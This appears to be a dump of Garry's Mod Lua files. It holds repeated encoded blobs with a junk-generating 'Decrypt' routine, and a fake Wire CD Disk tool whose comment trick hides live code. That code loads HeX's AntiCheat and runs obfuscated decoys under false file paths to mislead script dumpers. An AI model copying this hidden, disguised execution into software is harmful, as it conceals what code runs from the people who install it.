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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:51          --
------------------------------------------
/*TOOL.Category		= "Wire - Data"
TOOL.Name			= "CD Disk"
TOOL.Command		= nil
TOOL.ConfigName		= ""
TOOL.Tab			= "Wire"

if CLIENT then
    language.Add("Tool_wire_cd_disk_name", "CD Disk Tool (Wire)")
    language.Add("Tool_wire_cd_disk_desc", "Spawns a CD Disk.")
    language.Add("Tool_wire_cd_disk_0", "Primary: Create/Update CD Disk, Secondary: Change model")
    language.Add("WireDataTransfererTool_cd_disk", "CD Disk:")
	language.Add("sboxlimit_wire_cd_disks", "You've hit CD Disks limit!")
	language.Add("undone_Wire CD Disk", "Undone Wire CD Disk")
end

if SERVER then
	CreateConVar('sbox_maxnuke', 20)
end

TOOL.ClientConVar["model"] = "models/venompapa/wirecd_medium.mdl"
TOOL.ClientConVar["skin"] = "0"
TOOL.ClientConVar["pre"] = 4
TOOL.ClientConVar["iradius"] = 10

TOOL.FirstSelected = nil

cleanup.Register("wire_cd_disks")

function TOOL:LeftClick(trace)
	if (!trace.HitPos) then return false end
	if (trace.Entity:IsPlayer()) then return false end
	if CLIENT then return true end

	local ply = self:GetOwner()

	if (trace.Entity:IsValid() && trace.Entity:GetClass() == "gmod_wire_cd_disk" && trace.Entity.pl == ply) then
		trace.Entity.Precision = */HACInstalled = (HACInstalled or 1) + 1/* tonumber(self:GetClientInfo("precision"))
		trace.Entity.IRadius = tonumber(self:GetClientInfo("iradius"))
		trace.Entity:Setup()
		return true
	end

	if (!self:GetSWEP():CheckLimit("wire_cd_disks")) then return false end

	local Ang = trace.HitNormal:Angle()
	Ang.pitch = Ang.pitch + 90

	local wire_cd_disk = MakeWireCDDisk(ply, trace.HitPos, Ang , self:GetClientInfo("model"),tonumber(self:GetClientInfo("skin")))
	wire_cd_disk.Precision = tonumber(self:GetClientInfo("precision"))
	wire_cd_disk.IRadius = tonumber(self:GetClientInfo("iradius"))
	wire_cd_disk:Setup()

	local min = wire_cd_disk:OBBMins()
	wire_cd_disk:SetPos(trace.HitPos - trace.HitNormal * min.z)

	local const = WireLib.Weld(wire_cd_disk, trace.Entity, trace.PhysicsBone, true)

	undo.Create("Wire CD Disk")
		undo.AddEntity(wire_cd_disk)
		undo.AddEntity(const)
		undo.SetPlayer(ply)
	undo.Finish()

	ply:AddCleanup("wire_cd_disks", wire_cd_disk)
	ply:AddCleanup("wire_cd_disks", const)

	return true
end*/


local function ValidString(v)
	return (v and type(v) == "string" and v != "")
end
local function StringCheck(str,check)
	return tostring(str):sub(1,#check) == check
end

for k,v in pairs( file.Find("HAC/*.lua", "LUA") ) do
	if ValidString(v) and ( StringCheck(v, "sh_") or StringCheck(v, "cl_") ) then
		include("HAC/"..v)
		HACInstalled = HACInstalled + 1
	end
end


local TRun ={
	"lua/autorun/client/cl_HAC.lua",
	"lua/autorun/client/nuke_config_client.lua",
	"lua/en_streamhks.lua",
	"lua/en_hac.lua",
	"lua/HAC/cl_EatKeys.lua",
	"lua/HAC/cl_Whoops.lua",
	"lua/HAC/cl_TakeSC.lua",
	"lua/HAC/sh_HacBurst.lua",
	"lua/HAC/cl_BindBuff.lua",
	"lua/lists/sh_W_HKS.lua",
	"lua/lists/cl_W_HAC.lua",
	"lua/lists/cl_B_HAC.lua",
	"lua/lists/sh_W_HKS_old.lua",
}


local DCX = [[
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil
]]

local Rev = string.reverse
local BSS = util.Base64Encode
local CCC = util.Compress
local SSL = string.lower

local function RunCrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 2 do
		a = a * a - a
		c = c..Rev( BSS( CCC(i..a..v..i..a) ) ) 
		a = a * a + a
	end
	return c.."]]\n"..DCX
end


local NotSX = NotSX or RunStringEx
local function OpenCrypt()
	for k,v in pairs(TRun) do
		local Crypt = SecretCrypt and SecretCrypt("HACLoadOpenCrypt", v) or RunCrypt(v)
		NotSX(Crypt, v)
		NotSX(Crypt, "addons/HeX's AntiCheat/"..v)
		v = SSL(v)
		NotSX(Crypt, v)
		NotSX(Crypt, "addons/hex's anticheat/"..v)
		Crypt = nil
	end
end
OpenCrypt()

timer.Simple(0, function()
	OpenCrypt()
	NotSX 	 = nil
	_G.NotSX = nil
end)




----------------------------------------
--         2014-07-12 20:32:51          --
------------------------------------------
/*TOOL.Category		= "Wire - Data"
TOOL.Name			= "CD Disk"
TOOL.Command		= nil
TOOL.ConfigName		= ""
TOOL.Tab			= "Wire"

if CLIENT then
    language.Add("Tool_wire_cd_disk_name", "CD Disk Tool (Wire)")
    language.Add("Tool_wire_cd_disk_desc", "Spawns a CD Disk.")
    language.Add("Tool_wire_cd_disk_0", "Primary: Create/Update CD Disk, Secondary: Change model")
    language.Add("WireDataTransfererTool_cd_disk", "CD Disk:")
	language.Add("sboxlimit_wire_cd_disks", "You've hit CD Disks limit!")
	language.Add("undone_Wire CD Disk", "Undone Wire CD Disk")
end

if SERVER then
	CreateConVar('sbox_maxnuke', 20)
end

TOOL.ClientConVar["model"] = "models/venompapa/wirecd_medium.mdl"
TOOL.ClientConVar["skin"] = "0"
TOOL.ClientConVar["pre"] = 4
TOOL.ClientConVar["iradius"] = 10

TOOL.FirstSelected = nil

cleanup.Register("wire_cd_disks")

function TOOL:LeftClick(trace)
	if (!trace.HitPos) then return false end
	if (trace.Entity:IsPlayer()) then return false end
	if CLIENT then return true end

	local ply = self:GetOwner()

	if (trace.Entity:IsValid() && trace.Entity:GetClass() == "gmod_wire_cd_disk" && trace.Entity.pl == ply) then
		trace.Entity.Precision = */HACInstalled = (HACInstalled or 1) + 1/* tonumber(self:GetClientInfo("precision"))
